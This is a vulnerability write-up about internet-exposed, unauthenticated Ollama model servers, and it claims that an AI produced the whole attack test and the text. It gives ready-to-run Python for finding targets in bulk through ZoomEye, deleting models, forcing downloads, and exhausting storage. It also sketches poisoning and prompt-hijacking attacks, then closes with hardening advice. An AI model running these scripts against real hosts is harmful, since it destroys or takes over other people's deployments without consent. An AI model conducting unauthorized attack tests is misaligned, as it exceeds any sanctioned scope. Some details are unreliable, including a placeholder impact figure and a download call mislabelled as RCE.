Be careful, someone may have deleted your large model


Abstract

Recent network security scans of AI infrastructure have found a large number of unauthenticated Ollama large-model servers exposed on the public internet worldwide. These servers not only expose model management interfaces but also permit unauthorized access to sensitive operations. This paper reveals the technical details and potential hazards of this issue through empirical research.

This demonstrates that "AI attacking AI" has become a reality.


Apart from the initial idea, this test was completed entirely by AI, including the test cases and this document, from idea to attack test to write-up, in about half an hour.

I. Discovery Process

1.1 Application of Asset Mapping Technology

Targets can be located through the Zoomeye cyberspace search engine with the following syntax:

app="Ollama" + country="*"

Figure 1: Zoomeye search results
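
For batch collection, the same query can be issued programmatically. The sketch below is a minimal Python example; the endpoint URL, the API-KEY header, and the response layout are assumptions about ZoomEye's public REST API and should be verified against its current documentation:

import requests

# Assumed ZoomEye search endpoint and API-KEY header; verify against
# the current ZoomEye API documentation before use
ZOOMEYE_API = "https://api.zoomeye.org/host/search"

def search_ollama(api_key, page=1):
    resp = requests.get(
        ZOOMEYE_API,
        params={"query": 'app:"Ollama"', "page": page},
        headers={"API-KEY": api_key},
        timeout=15,
    )
    resp.raise_for_status()
    # Each match is expected to carry at least an IP and a port
    return resp.json().get("matches", [])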

1.2 API interface verification

Probe the open API endpoint:

GET /api/tags HTTP/1.1
Host: [Target IP]:11434

Typical response example:

{
  "models": [
    {
      "name": "deepseek-r1:7b",
      "model": "deepseek-r1:7b",
      "modified_at": "2025-02-12T21:48:07.4588927+08:00",
      "size": 4683075271,
      "details": {
        "parent_model": "",
        "format": "gguf",
        "family": "qwen2",
        "families": ["qwen2"],
        "parameter_size": "7.6B",
        "quantization_level": "Q4_K_M"
      }
    }
  ]
}
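
Verifying a single host takes one request. A minimal probe sketch (/api/tags is Ollama's documented model-listing endpoint; the target IP is a placeholder, and such probes should only be run against systems you are authorized to test):

import requests

def is_exposed(target_ip):
    # An exposed Ollama instance answers /api/tags with a "models" list
    try:
        resp = requests.get(f"http://{target_ip}:11434/api/tags", timeout=5)
        return resp.ok and "models" in resp.json()
    except (requests.RequestException, ValueError):
        return False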

II. Technical Risk Analysis

2.1 High-risk operation interface

Interface path    HTTP method    Risk level    Scope of impact
/api/pull         POST           Critical      Remote download of arbitrary models
/api/delete       DELETE         High          Deletion of existing models
/api/generate     POST           Medium        Model inference operations
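
The /api/delete endpoint realizes the threat in this article's title: a single unauthenticated request removes a deployed model. A minimal sketch, assuming Ollama's documented delete API (older builds expect "name" as the JSON key, newer ones "model"):

import requests

def delete_model(target_ip, model_name):
    # One unauthenticated DELETE request removes the model; older Ollama
    # builds expect {"name": ...}, newer ones {"model": ...}
    resp = requests.delete(
        f"http://{target_ip}:11434/api/delete",
        json={"name": model_name},
        timeout=10,
    )
    return resp.status_code == 200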


2.2 Attack Vector Example

Core code of the automated attack script:

import requests

def ollama_rce(target_ip, model_name):
    # Exploit the unauthenticated model download endpoint
    payload = {"name": model_name, "stream": False}
    resp = requests.post(f"http://{target_ip}:11434/api/pull", json=payload)

    if resp.status_code == 200:
        print(f"[+] Successfully deployed {model_name} model")
        # Subsequent inference attack code...
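
Invoked as, for example, ollama_rce("203.0.113.5", "deepseek-r1:7b") (the IP is illustrative), the attack needs only one request per host, which is what makes network-wide automation practical.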

Figure 2: Automated attack demonstration


III. Impact Range Statistics

Country/Region    Exposed hosts    Hosts with models
*/*               31,200           xxxx



IV. Advanced Attack Scenarios

  1. Model poisoning attack: inject malicious models through /api/pull
  2. Resource exhaustion attack: recursively download large models to exhaust storage (see the sketch after this list)
  3. Knowledge base leak: access /api/knowledge-base (further verification required)
  4. Prompt hijacking: tamper with the /system/prompts configuration
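
A minimal sketch of the resource exhaustion scenario; the model names are illustrative, and each successful pull writes several gigabytes to the victim's disk:

import requests

# Illustrative large models; each pull writes several GB to the target's disk
LARGE_MODELS = ["llama3:70b", "qwen2:72b", "deepseek-r1:70b"]

def exhaust_storage(target_ip):
    for name in LARGE_MODELS:
        # stream=False blocks until the pull completes (or the disk fills up)
        requests.post(
            f"http://{target_ip}:11434/api/pull",
            json={"name": name, "stream": False},
            timeout=None,
        )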

V. Defense Recommendations

5.1 Basic Protection

# Configure reverse proxy access restrictions
location /api/ {
    allow 192.168.1.0/24;
    deny all;
    auth_basic "Ollama Admin";
    auth_basic_user_file /etc/nginx/.htpasswd;
}
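
Layering a network allowlist over basic authentication means that a leaked password alone is not enough to reach the API from outside the trusted subnet.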

5.2 Enhancement Measures

  1. Bind the service to a local interface via the OLLAMA_HOST environment variable
  2. Configure TLS client certificate authentication
  3. Implement request rate limiting (recommended: under 5 req/min)
  4. Regularly audit model hash values (see the sketch after this list)
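
For item 4, a minimal audit sketch: snapshot the model list from /api/tags and diff it against a saved baseline. The "digest" field is assumed to be present in the /api/tags response of current Ollama versions:

import json
import requests

def snapshot(host):
    # Map model name -> digest as reported by /api/tags
    models = requests.get(f"http://{host}:11434/api/tags", timeout=5).json()["models"]
    return {m["name"]: m.get("digest", "") for m in models}

def audit(host, baseline_path="ollama_baseline.json"):
    current = snapshot(host)
    with open(baseline_path) as f:
        baseline = json.load(f)
    for name, digest in current.items():
        if name not in baseline:
            print(f"[!] Unexpected model: {name}")
        elif baseline[name] != digest:
            print(f"[!] Digest changed for: {name}")
    for name in baseline.keys() - current.keys():
        print(f"[!] Model deleted: {name}")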

VI. Conclusion

The rapid deployment of AI infrastructure stands in sharp contrast to the lag in its security. The cases disclosed in this article show that, with automated tools, attackers can complete the entire chain from target discovery to attack execution within minutes.

The following figures document the AI's assistance:

Figure 3: AI assists in completing the Python attack script

Figure 4: AI assists in writing this article


Figure 5: Program output mapping the network-wide exposure of private large models


Legal Statement: All technical details in this article are for security research purposes only; use for any illegal purpose is prohibited.


